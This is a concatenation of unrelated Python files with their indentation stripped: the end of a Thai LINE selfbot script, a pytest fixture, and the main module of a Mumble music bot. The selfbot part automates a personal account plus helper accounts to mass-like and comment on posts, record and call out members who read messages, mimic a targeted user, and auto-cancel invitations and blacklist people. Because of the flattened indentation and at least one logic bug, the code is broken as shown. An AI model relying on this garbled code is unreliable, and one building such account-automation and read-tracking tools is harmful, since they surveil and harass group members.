cl.sendText(msg.to,"SELF BOT\n[By.☬ARIFISTIFIK☬]")
elif msg.text in [".อยู่ไหม"]:
cl.sendText(msg.to,"อยู่...")
elif msg.text in ["/อยู่ไหม"]:
cl.sendText(msg.to,"เรื่องของกู...")
elif msg.text in ["/ออนไหม"]:
cl.sendText(msg.to,"ออน")
elif msg.text in ["/ปิดป้องกัน"]:
cl.sendText(msg.to,"ปิดป้องกัน")
elif "/ตั้งเวลา" == msg.text.lower():
if msg.to in wait2['readPoint']:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%H:%M:%S')
wait2['ROM'][msg.to] = {}
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.sendText(msg.to,"Lurking already on\nเปิดการอ่านอัตโนมัตกรุณาพิมพ์ ➠ /อ่าน")
else:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%H:%M:%S')
wait2['ROM'][msg.to] = {}
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.sendText(msg.to, "โปรเเกรมเปิดการอ่านอัตโนมัต\nSet reading point:\n" + datetime.now().strftime('%H:%M:%S'))
print wait2
elif "/ปิดการอ่าน" == msg.text.lower():
if msg.to not in wait2['readPoint']:
cl.sendText(msg.to,"Lurking already off\nปิดการอ่านอัตโนมัต")
else:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
cl.sendText(msg.to, "ปิดการอ่านอัตโนมัต\nDelete reading point:\n" + datetime.now().strftime('%H:%M:%S'))
elif "/อ่าน" == msg.text.lower():
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
cl.sendText(msg.to, "SELF BOT\n[By.☬ARIFISTIFIK☬] \n\nLurkers:\nNone")
else:
chiya = []
for rom in wait2["ROM"][msg.to].items():
chiya.append(rom[1])
cmem = cl.getContacts(chiya)
zx = ""
zxc = ""
zx2 = []
xpesan = 'Lurkers:\n'
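# build a LINE mention message: each '@a' placeholder in the text gets a
# {'S': start, 'E': end, 'M': mid} span in the MENTION content metadata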
for x in range(len(cmem)):
xname = str(cmem[x].displayName)
pesan = ''
pesan2 = pesan+"@a\n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':cmem[x].mid}
zx2.append(zx)
zxc += pesan2
msg.contentType = 0
print zxc
msg.text = xpesan+ zxc + "\nLurking time: %s\nCurrent time: %s"%(wait2['setTime'][msg.to],datetime.now().strftime('%H:%M:%S'))
lol ={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}
print lol
msg.contentMetadata = lol
try:
cl.sendMessage(msg)
except Exception as error:
print error
pass
else:
cl.sendText(msg.to, "กรุณาตั้งเวลาการอ่านใหม่อีกครั้งโปรดพิมพ์ ➠ /ตั้งเวลา")
elif msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True:
text = msg.text
if text is not None:
cl.sendText(msg.to, "[อัตโนมัติ]: " + text)
else:
if msg.contentType == 7:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "6",
"STKPKGID": "1", "STKVER": "100" }
cl.sendMessage(msg)
if op.type == 26:
msg = op.message
if msg.contentType == 16:
url = msg.contentMetadata['postEndUrl']
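# the fixed slices below apparently carve the home id (url[25:58]) and the
# post id (url[66:]) out of the Timeline post URL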
for acc in [cl, ki1, ki2, ki3, ki4, ki5, ki6, ki7, ki8, ki9, ki10]:
    acc.like(url[25:58], url[66:], likeType=1001)
    acc.comment(url[25:58], url[66:], wait["comment1"])
print ("AUTO LIKE SELFBOT")
print ("Auto Like By.☬ARIFISTIFIK☬")
if op.type == 15:
if wait["Notifed"] == True:
if op.param2 in Bots:
return
cl.sendText(op.param1,cl.getContact(op.param2).displayName + "\n เเล้วพบใหม่นะ ")
print "MEMBER OUT GROUP"
if op.type == 17:
if wait["Notifed"] == True:
if op.param2 in Bots:
return
ginfo = cl.getGroup(op.param1)
contact = cl.getContact(op.param2)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
cl.sendImageWithUrl(op.param1,image)
# build a fresh sticker message instead of reusing the stale 'msg' object,
# which is not defined in this operation branch
sticker = Message(to=op.param1, from_=None, text=None, contentType=7)
sticker.contentMetadata = {
    'STKPKGID': '9662',
    'STKTXT': '[]',
    'STKVER': '16',
    'STKID': '707'
}
cl.sendMessage(sticker)
print "MEMBER HAS JOIN THE GROUP"
if op.type == 19:
if wait["Notifed"] == True:
if op.param2 in Bots:
return
cl.sendText(op.param1,cl.getContact(op.param2).displayName + "\n ไม่น่าจะจุกเท่าไหร่หรอก ")
print "MEMBER HAS KICKOUT FROM THE GROUP"
if op.type == 15:
if wait["Notifedbot"] == True:
if op.param2 in Bots:
return
ki1.sendText(op.param1,cl.getContact(op.param2).displayName + "\n\n Bye~bye ")
ki2.sendText(op.param1,cl.getContact(op.param2).displayName + "\n\n Bye~bye ")
print "MEMBER OUT GROUP"
if op.type == 17:
if wait["Notifedbot"] == True:
if op.param2 in Bots:
return
ginfo = cl.getGroup(op.param1)
contact = cl.getContact(op.param2)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendImageWithUrl(op.param1,image)
cl.sendText(op.param1,cl.getContact(op.param2).displayName + "\n\n[🙋ยินดีตอนรับ][By. ☬ARIFISTIFIK☬]")
print "MEMBER HAS JOIN THE GROUP"
if op.type == 19:
if wait["Notifedbot"] == True:
if op.param2 in Bots:
return
ki1.sendText(op.param1,cl.getContact(op.param2).displayName + "\n ไม่น่าจะจุกเท่าไหร่หรอก ")
ki2.sendText(op.param1,cl.getContact(op.param2).displayName + "\n ไม่น่าจะจุกเท่าไหร่หรอก ")
print "MEMBER HAS KICKOUT FROM THE GROUP"
if op.type == 15:
if wait["bcommentOn"] == True:
if op.param2 in Bots:
return
cl.sendText(op.param1,cl.getContact(op.param2).displayName + "\n" + str(wait["bcomment"]))
print "MEMBER OUT GROUP"
if op.type == 17:
if wait["acommentOn"] == True:
if op.param2 in Bots:
return
cl.sendText(op.param1,cl.getContact(op.param2).displayName + "\n" + str(wait["acomment"]))
print "MEMBER HAS JOIN THE GROUP"
if op.type == 19:
if wait["ccommentOn"] == True:
if op.param2 in Bots:
return
cl.sendText(op.param1,cl.getContact(op.param2).displayName + "\n" + str(wait["ccomment"]))
print "MEMBER HAS KICKOUT FROM THE GROUP"
if op.type == 13:
if wait["Protectcancl"] == True:
if op.param2 not in Bots:
group = cl.getGroup(op.param1)
gMembMids = [contact.mid for contact in group.invitee]
random.choice(KAC).cancelGroupInvitation(op.param1, gMembMids)
if op.param3 == "1":
if op.param1 in protectname:
group = cl.getGroup(op.param1)
try:
group.name = wait["pro_name"][op.param1]
cl.updateGroup(group)
cl.sendText(op.param1, "Groupname protect now")
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except Exception as e:
print e
pass
if op.type == 55:
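# op.type 55 appears to fire when someone reads a message; record the
# reader (op.param2) as a lurker for the room (op.param1)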
try:
if op.param1 in wait2['readPoint']:
if op.param2 in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += op.param2
wait2['ROM'][op.param1][op.param2] = op.param2
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
else:
pass
except:
pass
if op.type == 59:
print op
except Exception as error:
print error
def a2():
now2 = datetime.now()
nowT = datetime.strftime(now2,"%M")
if nowT[14:] in ["10","20","30","40","50","00"]:
return False
else:
return True
def nameUpdate():
while True:
try:
#while a2():
#pass
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"༺%H:%M༻")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
time.sleep(600)
except:
pass
thread2 = threading.Thread(target=nameUpdate)
thread2.daemon = True
thread2.start()
while True:
try:
Ops = cl.fetchOps(cl.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
cl.Poll.rev = max(cl.Poll.rev, Op.revision)
bot(Op)
|
conftest.py
|
from .server import create_server
import pytest
from multiprocessing import Process
from threading import Thread
@pytest.fixture(scope='session', autouse=True)
def server_setup():
instance = create_server()
process = Process(target=instance.serve_forever)
# start() returns None, so start the process first and yield it instead
process.start()
yield process
process.terminate()
# from . import server
# import pytest
# # from multiprocessing import Process
# from threading import Thread
# @pytest.fixture(scope='module', autouse=True)
# def server_setup():
# instance = server.create_server()
# # process = Process(target=instance.serve_forever)
# process = Thread(target=instance.serve_forever)
# process.setDaemon(True)
# process.start()
|
mumbleBot.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import threading
import time
import sys
import math
import signal
import configparser
import audioop
import subprocess as sp
import argparse
import os
import os.path
import pymumble_py3 as pymumble
import pymumble_py3.constants
import variables as var
import logging
import logging.handlers
import traceback
import struct
from packaging import version
import util
import command
import constants
from constants import tr_cli as tr
from database import SettingsDatabase, MusicDatabase, DatabaseMigration
import media.system
from media.item import ValidationFailedError, PreparationFailedError
from media.playlist import BasePlaylist
from media.cache import MusicCache
class MumbleBot:
version = 'git'
def __init__(self, args):
self.log = logging.getLogger("bot")
self.log.info(f"bot: botamusique version {self.get_version()}, starting...")
signal.signal(signal.SIGINT, self.ctrl_caught)
self.cmd_handle = {}
self.stereo = var.config.getboolean('bot', 'stereo', fallback=True)
if args.channel:
self.channel = args.channel
else:
self.channel = var.config.get("server", "channel", fallback=None)
var.user = args.user
var.is_proxified = var.config.getboolean(
"webinterface", "is_web_proxified")
# Flags to indicate the bot is exiting (Ctrl-C, or !kill)
self.exit = False
self.nb_exit = 0
# Related to ffmpeg thread
self.thread = None
self.thread_stderr = None
self.read_pcm_size = 0
self.pcm_buffer_size = 0
self.last_ffmpeg_err = ""
# Play/pause status
self.is_pause = False
self.pause_at_id = ""
self.playhead = -1 # current position in a song.
self.song_start_at = -1
self.wait_for_ready = False # flag: the loop is waiting for a download to finish in another thread
#
self.on_interrupting = False
if args.host:
host = args.host
else:
host = var.config.get("server", "host")
if args.port:
port = args.port
else:
port = var.config.getint("server", "port")
if args.password:
password = args.password
else:
password = var.config.get("server", "password")
if args.channel:
self.channel = args.channel
else:
self.channel = var.config.get("server", "channel")
if args.certificate:
certificate = args.certificate
else:
certificate = util.solve_filepath(var.config.get("server", "certificate"))
if args.tokens:
tokens = args.tokens
else:
tokens = var.config.get("server", "tokens")
tokens = tokens.split(',')
if args.user:
self.username = args.user
else:
self.username = var.config.get("bot", "username")
self.mumble = pymumble.Mumble(host, user=self.username, port=port, password=password, tokens=tokens,
stereo=self.stereo,
debug=var.config.getboolean('debug', 'mumbleConnection'),
certfile=certificate)
self.mumble.callbacks.set_callback(pymumble.constants.PYMUMBLE_CLBK_TEXTMESSAGERECEIVED, self.message_received)
self.mumble.set_codec_profile("audio")
self.mumble.start() # start the mumble thread
self.mumble.is_ready() # wait for the connection
if self.mumble.connected >= pymumble.constants.PYMUMBLE_CONN_STATE_FAILED:
exit()
self.set_comment()
self.mumble.users.myself.unmute() # make sure the user is not muted
self.join_channel()
self.mumble.set_bandwidth(200000)
# ====== Volume ======
self.volume_helper = util.VolumeHelper()
_volume = var.config.getfloat('bot', 'volume', fallback=0.1)
if var.db.has_option('bot', 'volume'):
_volume = var.db.getfloat('bot', 'volume')
self.volume_helper.set_volume(_volume)
self.is_ducking = False
self.on_ducking = False
self.ducking_release = time.time()
self.last_volume_cycle_time = time.time()
self._ducking_volume = 0
_ducking_volume = var.config.getfloat("bot", "ducking_volume", fallback=0.05)
_ducking_volume = var.db.getfloat("bot", "ducking_volume", fallback=_ducking_volume)
self.volume_helper.set_ducking_volume(_ducking_volume)
self.ducking_threshold = var.config.getfloat("bot", "ducking_threshold", fallback=5000)
self.ducking_threshold = var.db.getfloat("bot", "ducking_threshold", fallback=self.ducking_threshold)
if not var.db.has_option("bot", "ducking") and var.config.getboolean("bot", "ducking", fallback=False) \
or var.config.getboolean("bot", "ducking"):
self.is_ducking = True
self.mumble.callbacks.set_callback(pymumble.constants.PYMUMBLE_CLBK_SOUNDRECEIVED,
self.ducking_sound_received)
self.mumble.set_receive_sound(True)
assert var.config.get("bot", "when_nobody_in_channel") in ['pause', 'pause_resume', 'stop', 'nothing', ''], \
"Unknown action for when_nobody_in_channel"
if var.config.get("bot", "when_nobody_in_channel", fallback='') in ['pause', 'pause_resume', 'stop']:
user_change_callback = \
lambda user, action: threading.Thread(target=self.users_changed,
args=(user, action), daemon=True).start()
self.mumble.callbacks.set_callback(pymumble.constants.PYMUMBLE_CLBK_USERREMOVED, user_change_callback)
self.mumble.callbacks.set_callback(pymumble.constants.PYMUMBLE_CLBK_USERUPDATED, user_change_callback)
# Debug use
self._loop_status = 'Idle'
self._display_rms = False
self._max_rms = 0
self.redirect_ffmpeg_log = var.config.getboolean('debug', 'redirect_ffmpeg_log', fallback=True)
if var.config.getboolean("bot", "auto_check_update"):
def check_update():
nonlocal self
new_version, changelog = util.check_update(self.get_version())
if new_version:
self.send_channel_msg(tr('new_version_found', new_version=new_version, changelog=changelog))
th = threading.Thread(target=check_update, name="UpdateThread")
th.daemon = True
th.start()
last_startup_version = var.db.get("bot", "version", fallback=None)
if not last_startup_version or version.parse(last_startup_version) < version.parse(self.version):
var.db.set("bot", "version", self.version)
changelog = util.fetch_changelog()
self.send_channel_msg(tr("update_successful", version=self.version, changelog=changelog))
# Set the CTRL+C shortcut
def ctrl_caught(self, signal, frame):
self.log.info(
"\nSIGINT caught, quitting, {} more to kill".format(2 - self.nb_exit))
if var.config.getboolean('bot', 'save_playlist', fallback=True) \
and var.config.get("bot", "save_music_library", fallback=True):
self.log.info("bot: save playlist into database")
var.playlist.save()
if self.nb_exit > 1:
self.log.info("Forced Quit")
sys.exit(0)
self.nb_exit += 1
self.exit = True
def get_version(self):
if self.version != "git":
return self.version
else:
return util.get_snapshot_version()
def register_command(self, cmd, handle, no_partial_match=False, access_outside_channel=False, admin=False):
cmds = cmd.split(",")
for command in cmds:
command = command.strip()
if command:
self.cmd_handle[command] = {'handle': handle,
'partial_match': not no_partial_match,
'access_outside_channel': access_outside_channel,
'admin': admin}
self.log.debug("bot: command added: " + command)
def set_comment(self):
self.mumble.users.myself.comment(var.config.get('bot', 'comment'))
def join_channel(self):
if self.channel:
if '/' in self.channel:
self.mumble.channels.find_by_tree(self.channel.split('/')).move_in()
else:
self.mumble.channels.find_by_name(self.channel).move_in()
# =======================
# Message
# =======================
# All text send to the chat is analysed by this function
def message_received(self, text):
message = text.message.strip()
user = self.mumble.users[text.actor]['name']
if var.config.getboolean('commands', 'split_username_at_space'):
# in case you use https://github.com/Natenom/mumblemoderator-module-collection/tree/master/os-suffixes ,
# you may want to split the username
user = user.split()[0]
if message[0] in var.config.get('commands', 'command_symbol'):
# remove the symbol from the message
message = message[1:].split(' ', 1)
# use the first word as a command, the others one as parameters
if len(message) > 0:
command = message[0].lower()
parameter = ''
if len(message) > 1:
parameter = message[1].rstrip()
else:
return
self.log.info('bot: received command ' + command + ' - ' + parameter + ' by ' + user)
# Anti stupid guy function
if not self.is_admin(user) and not var.config.getboolean('bot', 'allow_private_message') and text.session:
self.mumble.users[text.actor].send_text_message(
tr('pm_not_allowed'))
return
for i in var.db.items("user_ban"):
if user.lower() == i[0]:
self.mumble.users[text.actor].send_text_message(
tr('user_ban'))
return
if not self.is_admin(user) and parameter:
input_url = util.get_url_from_input(parameter)
if input_url:
for i in var.db.items("url_ban"):
if input_url == i[0]:
self.mumble.users[text.actor].send_text_message(
tr('url_ban'))
return
command_exc = ""
try:
if command in self.cmd_handle:
command_exc = command
else:
# try partial match
cmds = self.cmd_handle.keys()
matches = []
for cmd in cmds:
if cmd.startswith(command) and self.cmd_handle[cmd]['partial_match']:
matches.append(cmd)
if len(matches) == 1:
self.log.info("bot: {:s} matches {:s}".format(command, matches[0]))
command_exc = matches[0]
elif len(matches) > 1:
self.mumble.users[text.actor].send_text_message(
tr('which_command', commands="<br>".join(matches)))
return
else:
self.mumble.users[text.actor].send_text_message(
tr('bad_command', command=command))
return
if self.cmd_handle[command_exc]['admin'] and not self.is_admin(user):
self.mumble.users[text.actor].send_text_message(tr('not_admin'))
return
if not self.cmd_handle[command_exc]['access_outside_channel'] \
and not self.is_admin(user) \
and not var.config.getboolean('bot', 'allow_other_channel_message') \
and self.mumble.users[text.actor]['channel_id'] != self.mumble.users.myself['channel_id']:
self.mumble.users[text.actor].send_text_message(
tr('not_in_my_channel'))
return
self.cmd_handle[command_exc]['handle'](self, user, text, command_exc, parameter)
except:
error_traceback = traceback.format_exc()
error = error_traceback.rstrip().split("\n")[-1]
self.log.error(f"bot: command {command_exc} failed with error: {error_traceback}\n")
self.send_msg(tr('error_executing_command', command=command_exc, error=error), text)
def send_msg(self, msg, text):
msg = msg.encode('utf-8', 'ignore').decode('utf-8')
# 'text' is the message object; it tells us whether this was a direct or a channel message
self.mumble.users[text.actor].send_text_message(msg)
def send_channel_msg(self, msg):
msg = msg.encode('utf-8', 'ignore').decode('utf-8')
own_channel = self.mumble.channels[self.mumble.users.myself['channel_id']]
own_channel.send_text_message(msg)
@staticmethod
def is_admin(user):
list_admin = var.config.get('bot', 'admin').rstrip().split(';')
if user in list_admin:
return True
else:
return False
# =======================
# Users changed
# =======================
def users_changed(self, user, message):
own_channel = self.mumble.channels[self.mumble.users.myself['channel_id']]
# only check if there is one more user currently in the channel
# else when the music is paused and somebody joins, music would start playing again
if len(own_channel.get_users()) == 2:
if var.config.get("bot", "when_nobody_in_channel") == "pause_resume":
self.resume()
elif var.config.get("bot", "when_nobody_in_channel") == "pause":
self.send_channel_msg(tr("auto_paused"))
elif len(own_channel.get_users()) == 1:
# if the bot is the only user left in the channel
self.log.info('bot: Other users in the channel left. Stopping music now.')
if var.config.get("bot", "when_nobody_in_channel") == "stop":
self.clear()
else:
self.pause()
# =======================
# Launch and Download
# =======================
def launch_music(self, music_wrapper, start_from=0):
assert music_wrapper.is_ready()
uri = music_wrapper.uri()
self.log.info("bot: play music " + music_wrapper.format_debug_string())
if var.config.getboolean('bot', 'announce_current_music'):
self.send_channel_msg(music_wrapper.format_current_playing())
if var.config.getboolean('debug', 'ffmpeg'):
ffmpeg_debug = "debug"
else:
ffmpeg_debug = "warning"
channels = 2 if self.stereo else 1
self.pcm_buffer_size = 960*channels
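# read chunk size in bytes: 960 bytes per channel, i.e. 10 ms of 48 kHz
# signed 16-bit PCM per channel, matching the ffmpeg output format below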
command = ("ffmpeg", '-v', ffmpeg_debug, '-nostdin', '-i',
uri, '-ss', f"{start_from:f}", '-ac', str(channels), '-f', 's16le', '-ar', '48000', '-')
self.log.debug("bot: execute ffmpeg command: " + " ".join(command))
# The ffmpeg process is a thread
# prepare pipe for catching stderr of ffmpeg
if self.redirect_ffmpeg_log:
pipe_rd, pipe_wd = util.pipe_no_wait() # Let the pipe work in non-blocking mode
self.thread_stderr = os.fdopen(pipe_rd)
else:
pipe_rd, pipe_wd = None, None
self.thread = sp.Popen(command, stdout=sp.PIPE, stderr=pipe_wd, bufsize=self.pcm_buffer_size)
def async_download_next(self):
# Function start if the next music isn't ready
# Do nothing in case the next music is already downloaded
self.log.debug("bot: Async download next asked ")
while var.playlist.next_item() and var.playlist.next_item().type in ['url', 'url_from_playlist']:
# usually, all validation is done when an item is added to the list.
# however, for performance reasons, youtube playlists are not validated
# when added, so the validation has to be done here.
next = var.playlist.next_item()
try:
next.validate()
if not next.is_ready():
self.async_download(next)
break
except ValidationFailedError as e:
self.send_channel_msg(e.msg)
var.playlist.remove_by_id(next.id)
var.cache.free_and_delete(next.id)
def async_download(self, item):
th = threading.Thread(
target=self._download, name="Prepare-" + item.id[:7], args=(item,))
self.log.info(f"bot: start preparing item in thread: {item.format_debug_string()}")
th.daemon = True
th.start()
return th
def validate_and_start_download(self, item):
item.validate()
if not item.is_ready():
self.log.info("bot: current music isn't ready, start downloading.")
self.async_download(item)
self.send_channel_msg(
tr('download_in_progress', item=item.format_title()))
def _download(self, item):
ver = item.version
try:
item.prepare()
except PreparationFailedError as e:
self.send_channel_msg(e.msg)
return False
if item.version > ver:
var.playlist.version += 1
# =======================
# Loop
# =======================
# Main loop of the Bot
def loop(self):
while not self.exit and self.mumble.is_alive():
while self.thread and self.mumble.sound_output.get_buffer_size() > 0.5 and not self.exit:
# If the buffer isn't empty, I cannot send new music part, so I wait
self._loop_status = f'Wait for buffer {self.mumble.sound_output.get_buffer_size():.3f}'
time.sleep(0.01)
raw_music = None
if self.thread:
# I get raw from ffmpeg thread
# move playhead forward
self._loop_status = 'Reading raw'
if self.song_start_at == -1:
self.song_start_at = time.time() - self.playhead
self.playhead = time.time() - self.song_start_at
raw_music = self.thread.stdout.read(self.pcm_buffer_size)
self.read_pcm_size += len(raw_music)
if self.redirect_ffmpeg_log:
try:
self.last_ffmpeg_err = self.thread_stderr.readline()
if self.last_ffmpeg_err:
self.log.debug("ffmpeg: " + self.last_ffmpeg_err.strip("\n"))
except:
pass
if raw_music:
# Adjust the volume and send it to mumble
self.volume_cycle()
if not self.on_interrupting and len(raw_music) == self.pcm_buffer_size:
self.mumble.sound_output.add_sound(
audioop.mul(raw_music, 2, self.volume_helper.real_volume))
elif self.read_pcm_size == 0:
self.mumble.sound_output.add_sound(
audioop.mul(self._fadeout(raw_music, self.stereo, fadein=True), 2, self.volume_helper.real_volume))
elif self.on_interrupting or len(raw_music) < self.pcm_buffer_size:
self.mumble.sound_output.add_sound(
audioop.mul(self._fadeout(raw_music, self.stereo, fadein=False), 2, self.volume_helper.real_volume))
self.thread.kill()
self.thread = None
time.sleep(0.1)
self.on_interrupting = False
else:
time.sleep(0.1)
else:
time.sleep(0.1)
if not self.is_pause and not raw_music:
self.thread = None
# bot is not paused, but ffmpeg thread has gone.
# indicate that last song has finished, or the bot just resumed from pause, or something is wrong.
if self.read_pcm_size < self.pcm_buffer_size \
and var.playlist.current_index != -1 \
and self.last_ffmpeg_err:
current = var.playlist.current_item()
self.log.error("bot: cannot play music %s", current.format_debug_string())
self.log.error("bot: with ffmpeg error: %s", self.last_ffmpeg_err)
self.last_ffmpeg_err = ""
self.send_channel_msg(tr('unable_play', item=current.format_title()))
var.playlist.remove_by_id(current.id)
var.cache.free_and_delete(current.id)
# move to the next song.
if not self.wait_for_ready: # if wait_for_ready flag is not true, move to the next song.
if var.playlist.next():
current = var.playlist.current_item()
self.log.debug(f"bot: next into the song: {current.format_debug_string()}")
try:
self.validate_and_start_download(current)
self.wait_for_ready = True
self.song_start_at = -1
self.playhead = 0
except ValidationFailedError as e:
self.send_channel_msg(e.msg)
var.playlist.remove_by_id(current.id)
var.cache.free_and_delete(current.id)
else:
self._loop_status = 'Empty queue'
else:
# if wait_for_ready flag is true, means the pointer is already
# pointing to target song. start playing
current = var.playlist.current_item()
if current:
if current.is_ready():
self.wait_for_ready = False
self.read_pcm_size = 0
self.launch_music(current, self.playhead)
self.last_volume_cycle_time = time.time()
self.async_download_next()
elif current.is_failed():
var.playlist.remove_by_id(current.id)
self.wait_for_ready = False
else:
self._loop_status = 'Wait for the next item to be ready'
else:
self.wait_for_ready = False
while self.mumble.sound_output.get_buffer_size() > 0 and self.mumble.is_alive():
# Empty the buffer before exit
time.sleep(0.01)
time.sleep(0.5)
if self.exit:
self._loop_status = "exited"
if var.config.getboolean('bot', 'save_playlist', fallback=True) \
and var.config.get("bot", "save_music_library", fallback=True):
self.log.info("bot: save playlist into database")
var.playlist.save()
def volume_cycle(self):
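# Exponentially smooth the real volume toward its target: the ducking
# volume while ducking (time constant ~0.2 s), otherwise the configured
# volume (time constant ~0.5 s).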
delta = time.time() - self.last_volume_cycle_time
if self.on_ducking and self.ducking_release < time.time():
self.on_ducking = False
self._max_rms = 0
if delta > 0.001:
if self.is_ducking and self.on_ducking:
self.volume_helper.real_volume = \
(self.volume_helper.real_volume - self.volume_helper.ducking_volume_set) * math.exp(- delta / 0.2) \
+ self.volume_helper.ducking_volume_set
else:
self.volume_helper.real_volume = self.volume_helper.volume_set - \
(self.volume_helper.volume_set - self.volume_helper.real_volume) * math.exp(- delta / 0.5)
self.last_volume_cycle_time = time.time()
def ducking_sound_received(self, user, sound):
rms = audioop.rms(sound.pcm, 2)
self._max_rms = max(rms, self._max_rms)
if self._display_rms:
if rms < self.ducking_threshold:
print('%6d/%6d ' % (rms, self._max_rms) + '-' * int(rms / 200), end='\r')
else:
print('%6d/%6d ' % (rms, self._max_rms) + '-' * int(self.ducking_threshold / 200)
+ '+' * int((rms - self.ducking_threshold) / 200), end='\r')
if rms > self.ducking_threshold:
if self.on_ducking is False:
self.log.debug("bot: ducking triggered")
self.on_ducking = True
self.ducking_release = time.time() + 1 # ducking release after 1s
def _fadeout(self, _pcm_data, stereo=False, fadein=False):
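        # Apply an exponential fade mask (e^(-i/60)) to 16-bit little-endian PCM
        # samples; stereo data is interleaved, so both channels of each frame get the
        # same mask value. With fadein=True the mask is reversed (fade in from silence).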
pcm_data = bytearray(_pcm_data)
if stereo:
if not fadein:
mask = [math.exp(-x/60) for x in range(0, int(len(pcm_data) / 4))]
else:
mask = [math.exp(-x / 60) for x in reversed(range(0, int(len(pcm_data) / 4)))]
for i in range(int(len(pcm_data) / 4)):
pcm_data[4 * i:4 * i + 2] = struct.pack("<h",
round(struct.unpack("<h", pcm_data[4 * i:4 * i + 2])[0] * mask[i]))
pcm_data[4 * i + 2:4 * i + 4] = struct.pack("<h", round(
struct.unpack("<h", pcm_data[4 * i + 2:4 * i + 4])[0] * mask[i]))
else:
mask = [math.exp(-x/60) for x in range(0, int(len(pcm_data) / 2))]
for i in range(int(len(pcm_data) / 2)):
pcm_data[2 * i:2 * i + 2] = struct.pack("<h",
round(struct.unpack("<h", pcm_data[2 * i:2 * i + 2])[0] * mask[i]))
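        # Note: bytes(n) returns n zero bytes, so this appends an equal-length block
        # of silence after the faded samples.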
return bytes(pcm_data) + bytes(len(pcm_data))
# =======================
# Play Control
# =======================
def play(self, index=-1, start_at=0):
if not self.is_pause:
self.interrupt()
if index != -1:
var.playlist.point_to(index)
current = var.playlist.current_item()
self.validate_and_start_download(current)
self.is_pause = False
self.wait_for_ready = True
self.song_start_at = -1
self.playhead = start_at
def clear(self):
# Kill the ffmpeg thread and empty the playlist
self.interrupt()
var.playlist.clear()
self.wait_for_ready = False
self.log.info("bot: music stopped. playlist trashed.")
def stop(self):
self.interrupt()
self.is_pause = True
if len(var.playlist) > 0:
self.wait_for_ready = True
else:
self.wait_for_ready = False
self.log.info("bot: music stopped.")
def interrupt(self):
# Kill the ffmpeg thread
if self.thread:
self.on_interrupting = True
time.sleep(0.1)
self.song_start_at = -1
self.read_pcm_size = 0
def pause(self):
# Kill the ffmpeg thread
self.interrupt()
self.is_pause = True
self.song_start_at = -1
if len(var.playlist) > 0:
self.pause_at_id = var.playlist.current_item().id
self.log.info(f"bot: music paused at {self.playhead:.2f} seconds.")
def resume(self):
self.is_pause = False
if var.playlist.current_index == -1:
var.playlist.next()
self.playhead = 0
return
music_wrapper = var.playlist.current_item()
if not music_wrapper or not music_wrapper.id == self.pause_at_id or not music_wrapper.is_ready():
self.playhead = 0
return
self.wait_for_ready = True
self.pause_at_id = ""
def start_web_interface(addr, port):
global formatter
import interface
# setup logger
werkzeug_logger = logging.getLogger('werkzeug')
logfile = util.solve_filepath(var.config.get('webinterface', 'web_logfile'))
if logfile:
handler = logging.handlers.RotatingFileHandler(logfile, mode='a', maxBytes=10240) # Rotate after 10KB
else:
handler = logging.StreamHandler()
werkzeug_logger.addHandler(handler)
interface.init_proxy()
interface.web.env = 'development'
interface.web.secret_key = var.config.get('webinterface', 'flask_secret')
interface.web.run(port=port, host=addr)
if __name__ == '__main__':
supported_languages = util.get_supported_language()
parser = argparse.ArgumentParser(
description='Bot for playing music on Mumble')
# General arguments
parser.add_argument("--config", dest='config', type=str, default='configuration.ini',
help='Load configuration from this file. Default: configuration.ini')
parser.add_argument("--db", dest='db', type=str,
default=None, help='Settings database file')
parser.add_argument("--music-db", dest='music_db', type=str,
default=None, help='Music library database file')
parser.add_argument("--lang", dest='lang', type=str, default=None,
help='Preferred language. Support ' + ", ".join(supported_languages))
parser.add_argument("-q", "--quiet", dest="quiet",
action="store_true", help="Only Error logs")
parser.add_argument("-v", "--verbose", dest="verbose",
action="store_true", help="Show debug log")
# Mumble arguments
parser.add_argument("-s", "--server", dest="host",
type=str, help="Hostname of the Mumble server")
parser.add_argument("-u", "--user", dest="user",
type=str, help="Username for the bot")
parser.add_argument("-P", "--password", dest="password",
type=str, help="Server password, if required")
parser.add_argument("-T", "--tokens", dest="tokens",
type=str, help="Server tokens, if required")
parser.add_argument("-p", "--port", dest="port",
type=int, help="Port for the Mumble server")
parser.add_argument("-c", "--channel", dest="channel",
type=str, help="Default channel for the bot")
parser.add_argument("-C", "--cert", dest="certificate",
type=str, default=None, help="Certificate file")
args = parser.parse_args()
# ======================
# Load Config
# ======================
config = configparser.ConfigParser(interpolation=None, allow_no_value=True)
var.config = config
